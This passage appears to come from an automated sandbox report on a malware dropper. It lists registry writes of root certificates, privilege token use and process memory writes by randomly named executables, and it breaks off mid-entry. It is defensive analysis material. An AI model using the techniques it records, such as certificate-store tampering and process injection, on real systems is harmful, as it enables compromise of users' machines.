0100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Vytygydula.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Vytygydula.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri051e1e7444.exeqpVL2ZesZ5Dciz3WyY2qTUz4.exepid process 1012 Fri051e1e7444.exe 1012 Fri051e1e7444.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe 2996 qpVL2ZesZ5Dciz3WyY2qTUz4.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
msedge.exefoldershare.exepid process 3232 9532 msedge.exe 752 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
G51K2QNgA1moFPDcsqFsEuBz.exe1435.exepid process 3076 G51K2QNgA1moFPDcsqFsEuBz.exe 1844 1435.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
Processes:
msedge.exepid process 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe 6424 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
far1gFrhm6HTCSwt7AdHUaXK.exe5igv91LvXCMygMPp1mBVXES6.exeXQXdH_5JuxvMmlvSZF2UGNpF.exeWerFault.exeWerFault.exeDownFlSetup999.exedescription pid process Token: SeCreateTokenPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeAssignPrimaryTokenPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeLockMemoryPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeIncreaseQuotaPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeMachineAccountPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeTcbPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeSecurityPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeTakeOwnershipPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeLoadDriverPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeSystemProfilePrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeSystemtimePrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeProfSingleProcessPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeIncBasePriorityPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeCreatePagefilePrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeCreatePermanentPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeBackupPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeRestorePrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeShutdownPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeDebugPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeAuditPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeSystemEnvironmentPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeChangeNotifyPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeRemoteShutdownPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeUndockPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeSyncAgentPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeEnableDelegationPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeManageVolumePrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeImpersonatePrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeCreateGlobalPrivilege 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: 31 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: 32 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: 33 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: 34 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: 35 1320 far1gFrhm6HTCSwt7AdHUaXK.exe Token: SeDebugPrivilege 3168 5igv91LvXCMygMPp1mBVXES6.exe Token: SeDebugPrivilege 2348 XQXdH_5JuxvMmlvSZF2UGNpF.exe Token: SeRestorePrivilege 1248 WerFault.exe Token: SeBackupPrivilege 1248 WerFault.exe Token: SeRestorePrivilege 2864 WerFault.exe Token: SeBackupPrivilege 2864 WerFault.exe Token: SeDebugPrivilege 4760 DownFlSetup999.exe Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 Token: SeCreatePagefilePrivilege 3232 Token: SeShutdownPrivilege 3232 -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
installer.exemsedge.exepid process 13044 installer.exe 6424 msedge.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3232 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Fri051e1e7444.exeKtMfKMTyGhGITYlVicMT552T.exedescription pid process target process PID 1012 wrote to memory of 2996 1012 Fri051e1e7444.exe qpVL2ZesZ5Dciz3WyY2qTUz4.exe PID 1012 wrote to memory of 2996 1012 Fri051e1e7444.exe qpVL2ZesZ5Dciz3WyY2qTUz4.exe PID 1012 wrote to memory of 1540 1012 Fri051e1e7444.exe dcXxD_mTLuOWLK7yvm0uWiKh.exe PID 1012 wrote to memory of 1540 1012 Fri051e1e7444.exe dcXxD_mTLuOWLK7yvm0uWiKh.exe PID 1012 wrote to memory of 1976 1012 Fri051e1e7444.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1012 wrote to memory of 1976 1012 Fri051e1e7444.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1012 wrote to memory of 1976 1012 Fri051e1e7444.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1012 wrote to memory of 1888 1012 Fri051e1e7444.exe ZPIklAxPB6jR82sYubVd1wws.exe PID 1012 wrote to memory of 1888 1012 Fri051e1e7444.exe ZPIklAxPB6jR82sYubVd1wws.exe PID 1012 wrote to memory of 1888 1012 Fri051e1e7444.exe ZPIklAxPB6jR82sYubVd1wws.exe PID 1012 wrote to memory of 1904 1012 Fri051e1e7444.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe PID 1012 wrote to memory of 1904 1012 Fri051e1e7444.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe PID 1012 wrote to memory of 1904 1012 Fri051e1e7444.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe PID 1012 wrote to memory of 1672 1012 Fri051e1e7444.exe 5VZS13s3WByVbE4ADMVZQJD5.exe PID 1012 wrote to memory of 1672 1012 Fri051e1e7444.exe 5VZS13s3WByVbE4ADMVZQJD5.exe PID 1012 wrote to memory of 1672 1012 Fri051e1e7444.exe 5VZS13s3WByVbE4ADMVZQJD5.exe PID 1012 wrote to memory of 2096 1012 Fri051e1e7444.exe D9dd_RETOj4JIUabpjwAT2fp.exe PID 1012 wrote to memory of 2096 1012 Fri051e1e7444.exe D9dd_RETOj4JIUabpjwAT2fp.exe PID 1012 wrote to memory of 2096 1012 Fri051e1e7444.exe D9dd_RETOj4JIUabpjwAT2fp.exe PID 1012 wrote to memory of 2744 1012 Fri051e1e7444.exe iWl5YE6jVqxWhmGtApNhDm2L.exe PID 1012 wrote to memory of 2744 1012 Fri051e1e7444.exe iWl5YE6jVqxWhmGtApNhDm2L.exe PID 1012 wrote to memory of 2744 1012 Fri051e1e7444.exe iWl5YE6jVqxWhmGtApNhDm2L.exe PID 1012 wrote to memory of 3212 1012 Fri051e1e7444.exe oRqxkgsixdTQLGlCw_wScXlE.exe PID 1012 wrote to memory of 3212 1012 Fri051e1e7444.exe oRqxkgsixdTQLGlCw_wScXlE.exe PID 1012 wrote to memory of 3440 1012 Fri051e1e7444.exe KzQ4K19_9XrJ2mdTwpnysCw4.exe PID 1012 wrote to memory of 3440 1012 Fri051e1e7444.exe KzQ4K19_9XrJ2mdTwpnysCw4.exe PID 1012 wrote to memory of 3440 1012 Fri051e1e7444.exe KzQ4K19_9XrJ2mdTwpnysCw4.exe PID 1012 wrote to memory of 2840 1012 Fri051e1e7444.exe Vo5pWC9v4LM4GIuQjsgwgSyb.exe PID 1012 wrote to memory of 2840 1012 Fri051e1e7444.exe Vo5pWC9v4LM4GIuQjsgwgSyb.exe PID 1012 wrote to memory of 2840 1012 Fri051e1e7444.exe Vo5pWC9v4LM4GIuQjsgwgSyb.exe PID 1012 wrote to memory of 2912 1012 Fri051e1e7444.exe 0MCyp39H8AxiYTlGcyBfNoUC.exe PID 1012 wrote to memory of 2912 1012 Fri051e1e7444.exe 0MCyp39H8AxiYTlGcyBfNoUC.exe PID 1012 wrote to memory of 2912 1012 Fri051e1e7444.exe 0MCyp39H8AxiYTlGcyBfNoUC.exe PID 1012 wrote to memory of 720 1012 Fri051e1e7444.exe XBgLhb2BNUFW643gBLl6EQvv.exe PID 1012 wrote to memory of 720 1012 Fri051e1e7444.exe XBgLhb2BNUFW643gBLl6EQvv.exe PID 1012 wrote to memory of 3168 1012 Fri051e1e7444.exe 5igv91LvXCMygMPp1mBVXES6.exe PID 1012 wrote to memory of 3168 1012 Fri051e1e7444.exe 5igv91LvXCMygMPp1mBVXES6.exe PID 1012 wrote to memory of 3168 1012 Fri051e1e7444.exe 5igv91LvXCMygMPp1mBVXES6.exe PID 1012 wrote to memory of 4044 1012 Fri051e1e7444.exe _HVkO6KridfpAFsxSd4xBRC_.exe PID 1012 wrote to memory of 4044 1012 Fri051e1e7444.exe _HVkO6KridfpAFsxSd4xBRC_.exe PID 1012 wrote to memory of 4044 1012 Fri051e1e7444.exe _HVkO6KridfpAFsxSd4xBRC_.exe PID 1012 wrote to memory of 3196 1012 Fri051e1e7444.exe nGKKAdD43ozQJDv8K6QWTxN0.exe PID 1012 wrote to memory of 3196 1012 Fri051e1e7444.exe nGKKAdD43ozQJDv8K6QWTxN0.exe PID 1012 wrote to memory of 3196 1012 Fri051e1e7444.exe nGKKAdD43ozQJDv8K6QWTxN0.exe PID 1012 wrote to memory of 4388 1012 Fri051e1e7444.exe G51K2QNgA1moFPDcsqFsEuBz.exe PID 